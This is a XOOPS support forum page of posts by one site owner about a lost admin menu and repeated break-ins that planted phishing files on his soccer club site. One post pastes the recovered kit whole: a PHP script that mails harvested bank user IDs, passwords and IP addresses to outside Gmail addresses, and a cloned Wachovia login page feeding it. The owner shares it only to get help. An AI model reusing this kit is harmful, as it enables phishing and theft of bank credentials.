Support Forums - All Posts - XOOPS Web Application System

1

Re: lost admin menu

2009/1/5 23:53
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

Thats the funny part -- to be honest I didnt make any changes -- its a site for a local soccer club and doesnt get much int he shape of updating. They asked me to change something so I logged ina s admin and am thanked lol but no menu appears. I followed the mentioned FAQ and al is 1's and full privledges.

Thanks for the response,
Markus

2

Re: lost admin menu

2009/1/5 16:14
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

I am the only admin and it thanks me (admin) for loggin in -- I did try admin.php but tells me I dont have the right to access this area-- rof duh I am the admin -- How to go about the DB work to restore it -- thanks greatly for your response,
Markus

3

lost admin menu

2009/1/5 15:44
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

Howdy,
I have been using XOOPS for some time, not on the forums much because it just works :0) -- I have an issue -- I seem to have hidden my admin menu by mistake, and even tho I can login as admin I can not get to anything. Has anyone got a cure for this so I may get the adminmenu back wothout redoing everything? If this has already been addressed I apoligize I did some searching but this forum is very vast in posts :0)

Thank greatly,
Markus

4

lost admin menu

2009/1/2 0:23
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

It seems I must have hiddenmy adminmenu. I am able to login but cannot see the admin menu. Do I have to do a reinstall to reobtain the adminmenu? I have tried admin.php but tells me I donthave permission yet I am logged in as admin.

Thank you greatly,
Markus

5

Re: Open holes and hacked

2007/6/14 9:38
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

My bad on the gaining access wording -- lol I was thinking how the "" did they get in while I was typing it :0( SORRY

This has happened three times -- only once has a folder been in the uploads directory the other two it was in the root.( I also added the htaccess in the meantime)

Thank you for the google abuse tip -- I will send it out today to them. :0)

Still am afraid to reopen the site as this is the third strike with my hosting.It happenes again they are gonna lock my account.I never had a problem with previous versions of XOOPS in the last 2 years until now. I even email that person and told them there is no bank info on a free site and nothing is sold -- please remove me from your phishing list. They actually had the balls to return my email with a note "THANKS FOR THE INFO" and thats it. Thanks for all the help you guys are giving.

Markus

6

Re: Open holes and hacked

2007/6/14 1:26
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

BUMP.............................

Anyone please?

Thank you
Markus

7

Re: Open holes and hacked

2007/6/13 1:14
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

Ok heres the skinny on how they are gaining access or so I believe.

For some reason they can gain access and get this uploaded which makes it own folder called "seite", once as "module" (instead of modules (9 i caught that one lol) and once an html file in he uploads directory. ( I have since adjusted permisions, changed account password, rechecked main_file.php and added the htaccess that was mentioned here.

I had a wierd file called modules.zip -- I downloaded and looked in it. It had two files --

1. LOGIN.PHP

<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>


<?



$ip = getenv("REMOTE_ADDR");

$message .= "------------------------------n";

$message .= "User ID: ".$_POST['userid']."n";

$message .= "Password: ".$_POST['password']."n";

$message .= "IP: ".$ip."n";

$message .= "-------Created By Palmers-------n";





$recipient = "darkcrews@gmail.com,www.crew@gmail.com";

$subject = "WaChoviA";

$headers = "From: ";

$headers .= $_POST['eMailAdd']."n";

$headers .= "MIME-Version: 1.0n";

     if (mail($recipient,$subject,$message,$headers))

       {

           header("Location: http://www.wachovia.com");



       }

else

           {

         echo "ERROR! Please go back and try again.";

         }



?>

<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>

and an htm file called SERVICE.HTM

<<<<<<<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!---->

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<meta http-equiv="Pragma" content="no-cache" />

<meta http-equiv="Cache-Control" content="no-cache" />

<meta http-equiv="Expires" content="Mon, 01 Jan 2001 13:00:00 GMT" />

<title>Online Services - Account Login</title>

    <link href="https://onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />

    <link href="https://onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />

    <style type="text/css">@import url("/ols/css/interference.css");</style>

    <link href="https://onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />

    <script type="text/javascript" language="JavaScript1.2" src="https://www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>



<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/utility.js"></script>

<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/messaging.js"></script>

<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/login.js"></script>

<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/bidata.js"></script>

<script type="text/javascript" language="JavaScript">

<!--

if (top != self) {

    top.location=self.location;

}

document.cookie='CookiesAreEnabled=yes; path=/; secure';

window.name="LoginPage";

var timeStamp = new Date().getTime();

//-->

</script>

</head>

<body id="default" class="twocol login" onunload="passReset();enableSubmits();">

<!-- Dual Login Form -->

<form method="post" action="/auth/AuthService" name="dualForm" id="dualForm" onsubmit="return disableSubmits();">

    <input type="hidden" name="action" value="presentLogin" />

    <input type="hidden" name="credtype" value="DUAL" />

        <input type="hidden" name="credtype" value="UID" />

</form>

<div id="limiter">

<div id="header"><img src="https://onlineservices.wachovia.com/ols/images/logo.gif" alt="Wachovia Logo" width="240" height="52" id="logo" /><script type="text/javascript" language="JavaScript">setBrand();</script>

        <img src="https://onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" width="246" height="21" id="subbrand" />

    </div>

    <div id="pusher">

        <div id="content">

            <div id="main">                

                <h1>Online Services Login</h1>                

                <div id="details">        

                <p>Enter the appropriate login information below, and select your service.</p>                

                </div>                    

                <ul>

                <li>Retirement Plan Participants: <a href="https://commercial.wachovia.com/Online/Financial/Business/Service?action=wrsLogin">Login</a></li>

                </ul>                

                <form method="post" action="login.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return disableSubmits();">

        <input type="hidden" name="credtype" value="UID" />

                <input type="hidden" value="uidLogin" name="action" />

                <input type="hidden" value="" name="bi" />

                <input type="hidden" value="" name="requestTimestamp" />

                <table border="0" cellpadding="0" cellspacing="0" class="formtable">

                <tr>

                    <td class="colgutter"></td>

                    <td class="label"><label for="userid">User ID</label>

                    <td class="colgutter"></td>

                    <td><input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="1"></td>

                </tr>

                <tr>

                    <td colspan="3"></td>

                    <td>

                        <label for="rememberuid" class="nestinput"><input type="checkbox" name="rememberuid" id="rememberuid" tabindex="6" />Remember my User ID</label>&nbsp;&nbsp;&nbsp;

                        <a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/remember_my_user_id.htm')" tabindex="7" >Learn More</a>

                    </td>

                </tr>

                <tr>

                    <td></td>

                    <td class="label" nowrap="nowrap"><label for="password">Password</label></td>

                    <td class="colgutter"></td>

                    <td><input type="password" name="password" id="password" autocomplete="off" value="" tabindex="2" /></td>

                </tr>

                <tr><td></td><td></td><td></td><td><div class="format">Case Sensitive</div></td></tr>                

                <tr>

                    <td></td>

                    <td class="label" nowrap="nowrap"><label for="service">Service Selection</label></td>

                    <td class="colgutter"></td>

                    <td>

                    <select name="systemtarget"  width="160" onchange="getValue(this.form.name);" tabindex="3">

                        <option value="gotoOSH">Choose a service...</option>

                        <option value="gotoOSH">Online Services Home</option>

                        <option value="gotoBanking">Online Banking</option>

                        <option value="gotoBillPay">Online BillPay</option>

                        <option value="gotoBrokerage">Online Brokerage</option>

                    </select>

                    </td>

                </tr>                

                <tr>

                    <td colspan="4" class="center">

                    

                    <input type="submit" value="Login" tabindex="4" class="button w80" id="submitButton" name="submitButton">

                    </td>

                </tr>

                </table>

                </form>

            </div>

            <div id="related" class="clear">

                <div class="box">

                    <h2><span>Customer Service</span></h2>

                    <h3></h3>

                    <ul>

                        <li><a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/user_id_and_password_rules.htm')">User ID &amp; Password Help</a></li>

                        <li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=USERIDLOOKUP&amp;credtype=UID">Forgot your User ID?</a></li>

                        <li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=PWRESET&amp;returnurl=/auth/AuthService&amp;credtype=UID">Reset your Password</a></li>

                    </ul>

                    

                    <h3></h3>

                    <ul class="small">

                        <li>Customer Access Number: <a href="#" onclick="return submitForm('dualForm');">Login</a></li>

                    </ul>                    

                </div>

                <div id="promo">

                <script type="text/javascript" language="JavaScript">

                <!--

                showMessage("slotA");

                //-->

                </script>

                </div>

            </div>

            <hr class="textonly" />

            <div id="navigation" class="blue">

                <h2 class="ir">Navigation</h2>                

                <div id="utilities" class="utility"></div>        

                <div id="global" class="utility">

                    <ul>                    

                        <li class="first" id="officelocator"><a href="http://www.wachoviasec.com/home/locator.asp" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a></li>

                        <li class="first" id="locations"><a href="http://wachovia.via.infonow.net/locator/?src=OLB" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Locations</a></li>

                    </ul>                    

                </div>

            </div>

        </div>

    </div>

    <hr class="textonly" />

    <div id="footer">

        <ul id="footerlinks" class="utility">

            <li class="first"><a href="http://www.wachovia.com/popup/agreement/" target="popupwin" onclick="return popWinStnd(this.href);">Customer Agreement</a></li>

            <li><a href="http://www.wachovia.com/popup/privacy/" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>

            <li><a href="http://www.wachovia.com/popup/security/" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>

            <li><a href="http://www.wachovia.com/popup/legal/" target="popupwin" onclick="return popWinStnd(this.href);">Legal</a></li>

        </ul>

        <div id="copyright">&copy; 2007 Wachovia Corporation. All rights reserved.</div>

    </div>

    <div id="footeralt">

        <ul id="footerlinks" class="utility">

            <li class="first"><a href="https://wachseconline.wachovia.com/LD_Privacy.html" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>

            <li><a href="https://wachseconline.wachovia.com/LD_Security.html" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>

            <li><a href="https://wachseconline.wachovia.com/LD_AccessOnlineAgree.html" target="popupwin" onclick="return popWinStnd(this.href);">Legal Disclosures</a></li>

            <li><a href="https://wachseconline.wachovia.com/LD_Contact.html" target="popupwin" onclick="return popWinStnd(this.href);">Contact Us</a></li>

        </ul>

        <div id="copyright">&copy; 2007 Wachovia Securities, LLC (member NYSE/SIPC)</div>

        <table id="notmay">

        <caption>Securities and Insurance Products:<caption>

        <tr>

            <td>Not Insured by FDIC or any<br />Federal Government Agency</td>

            <td>May Lose<br />Value</td>

            <td>Not a Deposit of or Guaranteed by<br />a Bank or any Bank affiliate</td>

        </tr>

        </table>

        <div id="disclosure">

        <p>Wachovia Securities is the trade name used by two separate, registered broker-dealers and non-bank affiliates of 

        Wachovia Corporation providing certain retail securities brokerage services: Wachovia Securities, LLC, member 

        NYSE/SIPC, and Wachovia Securities Financial Network, LLC, member <span class="small">NASD</span>/SIPC.  Accounts 

        carried by First Clearing, LLC, member NYSE/SIPC.</p>

        <p>Insurance products are offered through non-bank affiliates of Wachovia Corporation and are underwritten by unaffiliated 

        insurance companies.</p>

        </div>

    </div>

</div>

<script language="JavaScript">

<!--

setSelection();

document.uidAuthForm.requestTimestamp.value = timeStamp;

setUID('RMUID_1','rememberuid','userid','password');

setData();

//-->

</script>

<!-- BEGIN WEBSIDESTORY CODE v8.0.10 (11up) -->

<!-- COPYRIGHT 1997-2003 WEBSIDESTORY, INC. ALL RIGHTS RESERVED. U.S.PATENT No. 6,393,479 B1. Privacy notice at: http://websidestory.com/privacy -->

<script type="text/javascript" language="JavaScript" id="_hbc">

<!--

var _acct="DM530604BKCA;DM5306045EBV";    //account number(s)

var _pn="Wachovia+UID+Login+Page"; //page name(s)

var _mlc="/login"; //multi-level content category

var _seg=""; // visitor segmentation

var _cmp=""; // campaign id

var _gp="";  // campaign goal

var _cmpn="";// campaign id in query

var _gpn=""; // campaign goal in query

var _fnl=""; // funnels

var _pec=""; // error codes

var _fv="";  // form validation function name

var _dcmp="";// dynamic campaign

var _dcmpn="";//dynamic campaign in query

var _hra=""; // response attribute

var _hcn=""; // conversion

var _hcv=""; // conversion value

var _hlt=""; // lead tracking

var _hla=""; // lead attribute

var _hqsr="";// response attribute in referrer query

var _hqsp="";// response attribute in query

var _hc1=""; // custom 1

var _hc2=""; // custom 2

var _hc3=""; // custom 3

var _hc4=""; // custom 4

var _cid=""; // customer id

var _cp="null"; // campaign

var _cpd=""; // campaign domain

var _pndef="title"; //default page name

var _ctdef="full"; //default content category

var _dlf="n"; //download filter

var _elf="n"; //exit link filter

var _epg="n"; //event page identifier

var _gn="ehg-wachovia.hitbox.com",_mn="we56"; //gateway & machine name

//-->

</script>

<script type="text/javascript" language="JavaScript1.1" defer="defer" src="https://www.wachovia.com/metrics/stats.js"></script>

<!-- END WEBSIDESTORY CODE  -->

<!-- Start of DoubleClick Spotlight Tag: Please do not remove-->

<!-- Activity Name for this tag is:Online Services Login -->

<!-- Web site URL where tag should be placed: https://onlineservices.ite.wachovia.com/auth/AuthService?action=presentLogin&url=%2FNASApp%2FNavApp%2FTitanium%3faction=returnHome -->

<!-- This tag must be placed within the opening <body> tag, as close to the beginning of it as possible-->

<!-- Creation Date:07/07/03 -->

<script language="JavaScript">

var axel = Math.random()+"";

var a = axel * 10000000000000;

document.write('<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num='+ a + '?" width="1" height="1" border="0">');

</script>

<noscript>

<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">

</noscript>

<!-- End of DoubleClick Spotlight Tag: Please do not remove-->

</body>

</html>

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>>

I would appreciate any help given in how to stop this -- apparently I have a three strike rule with my host and I will be asked to go to another server. :0(

Thank you,
Markus

8

Re: Open holes and hacked

2007/6/2 11:09
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

<QUOTE>
" Can you summarize which version of XOOPS you use and which modules are installed? "

Xoops Version ---- 2.0.16
pical
XOOPS stats
even news
XOOPS polls
xc gallery
my iframe
XOOPS links
tiny d
tiny content
content
classified ads (P'tites annonces)
xt conteudo
2 other instances of my iframe also
world weather

Thank you

Good idea on the htaccess -- I will add one tonite. Thank you

The web server logs are a nightmare :0( I go into my control panel and dload the raw access logs -- unRAR them and they unzip as a msdos application (looks like an exe icon but properities says "msdos application". Hosting says right click and choose notepad or wordpad -- no "open with" option for this when right clicking on the file. I am unsure what to do here with trying to view them.

Thanks greatly for all the responses. I have since changed chmod on the upload directory and informed the members it is temporaly disabled due to the fradulant activity.

Markus

9

Re: Open holes and hacked

2007/6/1 9:30
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

I thought so also (SS issue) but as hosting goes lol they say there must be a hole or backdoor into the script. I have run this (xoops) for 3 years now with this addy and server with no problems. Thanks for the heads up on protector-- I will be looking inot it tonite.

Thank you ,
Markus

10

Open holes and hacked

2007/6/1 1:50
dizzymarkus
Not too shy to talk
Posts: 108
Since: 2006/1/18

Two times in three weeks someone or some people have hacked into my XOOPS site and actually uploaded files to my server. Phishing for Wachovia Bank info.

The first time they uloaded a folder named "module" -- I saw it that morning and thought that was wierd, that shouldnt be there -- off to work I went -- account was suspended by the time I got home.I removed the folder in question and they turned me back on.

The second time (3 weeks later and an account password change) whoever uploaded approx. 12 files to the "uploads" directory. Mostly php files and 2 text files -- again phishing for bank info. I searched all my files and folders for stuff that didnt belong. How are they getting in?

Is there any known holes or backdoors for people to get in ? I cannot access my raw logs as the unRAR as a msdos file and I cannot get it to open correcly.

So once to the main directory tree and once to the uploads directory. Thank for anyhelp given for this as its getting very frustrating.

Markus

www.ocqmc.com

Stats
Goal:	$100.00
Due Date:	Apr 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Re: lost admin menu

Re: lost admin menu

lost admin menu

lost admin menu

Re: Open holes and hacked

Re: Open holes and hacked

Re: Open holes and hacked

Re: Open holes and hacked

Re: Open holes and hacked

Open holes and hacked

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}